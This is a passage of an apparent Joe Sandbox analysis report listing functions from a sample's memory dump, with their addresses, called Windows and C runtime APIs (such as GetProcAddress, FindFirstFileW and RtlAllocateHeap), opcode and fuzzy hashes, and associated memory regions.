                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                    • String ID:
                                                                                    • API String ID: 1918208029-0
                                                                                    • Opcode ID: 2eb21c46ee51cfbce03a22da80308ab781c0abaa722f3c536278f6a3588dbffd
                                                                                    • Instruction ID: 79b2f97575f0c769d339684886a3dc9e9dbe802d70e90130bb9bc2ad6ee4fed9
                                                                                    • Opcode Fuzzy Hash: 2eb21c46ee51cfbce03a22da80308ab781c0abaa722f3c536278f6a3588dbffd
                                                                                    • Instruction Fuzzy Hash: 8CE0EDB2900218EBDB10DF55C545B9DBBE8EB14365F10845AA88693242E3B8AE44DB91
                                                                                    Function 00742B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00742BAA
                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00742BB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                    • String ID:
                                                                                    • API String ID: 1660781231-0
                                                                                    • Opcode ID: 07dc4bd2ea21ae8b26f7764305f406a54f10f3b91b4a8a46ca0b2e8084df71ae
                                                                                    • Instruction ID: 0097eedb81c52abda02b9db1d8669125511a8d37facbb348df11c2f0539a3149
                                                                                    • Opcode Fuzzy Hash: 07dc4bd2ea21ae8b26f7764305f406a54f10f3b91b4a8a46ca0b2e8084df71ae
                                                                                    • Instruction Fuzzy Hash: F9D0A7F4694300944C542E70390A4642745DD417757E04696F430858C3FB5C8053D119
                                                                                    Function 007212F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3351165006-0
                                                                                    • Opcode ID: 4f4ee27aa5e4233efba1266e91e945473e5286fed5ea5ad50ba186147f2b7bd9
                                                                                    • Instruction ID: b8ea51faebf2f2b7fbe60df07771f5797faff18ec391fdef41ea2cf9635917d1
                                                                                    • Opcode Fuzzy Hash: 4f4ee27aa5e4233efba1266e91e945473e5286fed5ea5ad50ba186147f2b7bd9
                                                                                    • Instruction Fuzzy Hash: 6DC0123289C608BECB010BB8DC0DC2BBBA8ABA5B12F24C908B0A5C0060E23CC110DB11
                                                                                    Function 00721A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 60e38544c5140dd777f2505f46e724a76a63bcd075357ac0f8b82f1780d3adbe
                                                                                    • Instruction ID: ce392b411794af8b110d702af50047a509c27ac7f920e5364557dbd5c677b070
                                                                                    • Opcode Fuzzy Hash: 60e38544c5140dd777f2505f46e724a76a63bcd075357ac0f8b82f1780d3adbe
                                                                                    • Instruction Fuzzy Hash: FBC1E370A00264DFEF15CF28D498BA97BB5BF29310F4841B9EC459B396DB389944CB61
                                                                                    Function 00723BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 50fd62d638450a44173809733a4baa6e25f312f0e1f8916ff8e52a1ccf23a18a
                                                                                    • Instruction ID: 94a8a1a4b0e010a29eac262d803d30d48e2c15b3a27b23a6005c33ba78357b54
                                                                                    • Opcode Fuzzy Hash: 50fd62d638450a44173809733a4baa6e25f312f0e1f8916ff8e52a1ccf23a18a
                                                                                    • Instruction Fuzzy Hash: ED71F571500B94DEDB35DB70D8499E7B7E9AF14300F41092EF2AB87242DA3E6A88CF11
                                                                                    Function 00728284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00728289
                                                                                      • Part of subcall function 007213DC: __EH_prolog.LIBCMT ref: 007213E1
                                                                                      • Part of subcall function 0072A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 2506663941-0
                                                                                    • Opcode ID: 403cf7a6dcf90417157e871e07196be5ba01aec1f4023d709398616d4e377386
                                                                                    • Instruction ID: ca0473e300d949835e80a01aafb6c13adbe4f5e2ec7d96ab6497bb3ca089f195
                                                                                    • Opcode Fuzzy Hash: 403cf7a6dcf90417157e871e07196be5ba01aec1f4023d709398616d4e377386
                                                                                    • Instruction Fuzzy Hash: DB41B871945668DADB20EB60DC59AEEB3B8BF10304F4404EBE14A57083EB795FC5CB51
                                                                                    Function 007213E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 007213E1
                                                                                      • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
                                                                                      • Part of subcall function 0072CE40: __EH_prolog.LIBCMT ref: 0072CE45
                                                                                      • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 6c4301617b872a70e0fddc6c00422dc13d80e7165ba3bf753f6292853f58969f
                                                                                    • Instruction ID: 979f42b91b62af22fc69bfa6a0b135a87016bd7abcb1f0a40a14d3b91579e321
                                                                                    • Opcode Fuzzy Hash: 6c4301617b872a70e0fddc6c00422dc13d80e7165ba3bf753f6292853f58969f
                                                                                    • Instruction Fuzzy Hash: 23415DB0905B40DEE724DF398889AE6FBE5BF28300F50492EE5FE87282C7356654CB10
                                                                                    Function 007213DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 007213E1
                                                                                      • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
                                                                                      • Part of subcall function 0072CE40: __EH_prolog.LIBCMT ref: 0072CE45
                                                                                      • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: abed1cffc514613976da7f9e4e2c4a99f2643eefd9814034490df0aecc0af336
                                                                                    • Instruction ID: db7f6d9c3f385ac81b0bf5ecb1ccdab9be622274af07af1fa3ea6ddeec1f48b2
                                                                                    • Opcode Fuzzy Hash: abed1cffc514613976da7f9e4e2c4a99f2643eefd9814034490df0aecc0af336
                                                                                    • Instruction Fuzzy Hash: E8413AB0905B40DEE724DF798889AE6FBE5BF29300F50492ED5FE87282CB756654CB10
                                                                                    Function 0073B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0073B098
                                                                                      • Part of subcall function 007213DC: __EH_prolog.LIBCMT ref: 007213E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: d3c94d4f48a01ba3db05e6b93154f1cd19979db7db2cbb54d986cc2b48343c94
                                                                                    • Instruction ID: f2195bb828fe8b2ea82a809d70679526c7a4aa0e698cad56240c6d1306bdc8d9
                                                                                    • Opcode Fuzzy Hash: d3c94d4f48a01ba3db05e6b93154f1cd19979db7db2cbb54d986cc2b48343c94
                                                                                    • Instruction Fuzzy Hash: 12319E71C00259DADF15DF64D855AEEBBB4AF19300F5044AEE409B3242D779AF04CB61
                                                                                    Function 0074AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0074ACF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: 97c4724bc64c193d23198ec98cd5ddc2944f1748fc3fa595c1099496600009d1
                                                                                    • Instruction ID: 1345c6250d9fee23df933212a0fdbfba1fa5235bdc7c76e2c28e0bfce3efe5dc
                                                                                    • Opcode Fuzzy Hash: 97c4724bc64c193d23198ec98cd5ddc2944f1748fc3fa595c1099496600009d1
                                                                                    • Instruction Fuzzy Hash: F311CA33B40625BF9B259F28DC9099A7395EB8436171A8520FD15AB298DB38DD018BE2
                                                                                    Function 00729215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: fe89e3260542cda57e5efbdc10422130a09d87aadc1c3bb41e63df4b58faf4e6
                                                                                    • Instruction ID: 8e0d87010a66ee6d2e4e84a7e2982be8684e39c9a78e285c6f09310a376ac642
                                                                                    • Opcode Fuzzy Hash: fe89e3260542cda57e5efbdc10422130a09d87aadc1c3bb41e63df4b58faf4e6
                                                                                    • Instruction Fuzzy Hash: 04018233900538EBCF26EBA8DC869DEB775FF88740F054125E912B7152DA38CD14C6A0
                                                                                    Function 00743C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00743C3F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: e5a24f1f116383bad74cffdbc9cb244dbfea8cd4572de7929fc94cb958ba1fee
                                                                                    • Instruction ID: 77c60563b323183ffd2bf31ad363e4a5a393295e218996c0181634a678b7c6ca
                                                                                    • Opcode Fuzzy Hash: e5a24f1f116383bad74cffdbc9cb244dbfea8cd4572de7929fc94cb958ba1fee
                                                                                    • Instruction Fuzzy Hash: 8FF0EC362003169FDF114E68EC4499A7799EF01B617104125FE1DE71D0DB35EA20C7E0
                                                                                    Function 00748E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 819bd5a456fc27f8128ab358645ed0537c142d4678b07e4499d94c74c7380152
                                                                                    • Instruction ID: 7d0e8fd4f42fdcbc3c3c5028e8097820cf0fcc4eb74f6c428113469b6c17734e
                                                                                    • Opcode Fuzzy Hash: 819bd5a456fc27f8128ab358645ed0537c142d4678b07e4499d94c74c7380152
                                                                                    • Instruction Fuzzy Hash: 17E06D3124623DA7EAF126759C09B9F76489F41BA8F2A4161BC1996091DF6DCC0182E7
                                                                                    Function 00725ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00725AC2
                                                                                      • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: fd461250f5b897ad6a7e58a6eeeb0d68f636b3a9ccdce60cd6a94a2a707c1f5e
                                                                                    • Instruction ID: aa4ddce96ca0a227c7565126fe48c0e30ea1ee8781384a146687d48442595e5e
                                                                                    • Opcode Fuzzy Hash: fd461250f5b897ad6a7e58a6eeeb0d68f636b3a9ccdce60cd6a94a2a707c1f5e
                                                                                    • Instruction Fuzzy Hash: A901AF30810794DAE725EBB8C06A7DEFBE4DF64304F50848DE45653283CBB91B08DBA2
                                                                                    Function 0072A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0072A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6C4
                                                                                      • Part of subcall function 0072A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6F2
                                                                                      • Part of subcall function 0072A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6FE
                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
